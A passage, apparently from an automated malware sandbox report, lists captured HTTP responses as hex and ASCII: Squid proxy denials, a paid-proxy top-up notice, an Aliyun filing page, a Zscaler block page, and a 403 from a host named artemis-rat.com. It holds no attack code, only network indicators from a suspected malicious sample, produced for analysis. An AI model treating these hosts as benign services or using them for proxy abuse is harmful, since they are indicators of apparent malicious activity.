6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:12 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:12 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:12 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:13 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:13 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:13 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 3832X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization, TokenAccess-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE,UPDATEAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-TypeContent-Type: text/plain; charset=utf-8Set-Cookie: uuid=8b1086ba-de0e-11ee-9749-fa20201ff994; Path=/; Max-Age=8640000; HttpOnlyX-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:13 GMTContent-Length: 31Data Raw: 75 6e 73 75 70 70 6f 72 74 65 64 20 70 72 6f 74 6f 63 6f 6c 20 73 63 68 65 6d 65 20 22 22 0a Data Ascii: unsupported protocol scheme ""
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:14 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:14 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlServer: Zscaler/6.2Cache-Control: no-cacheAccess-Control-Allow-Origin: *Content-length: 13597Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 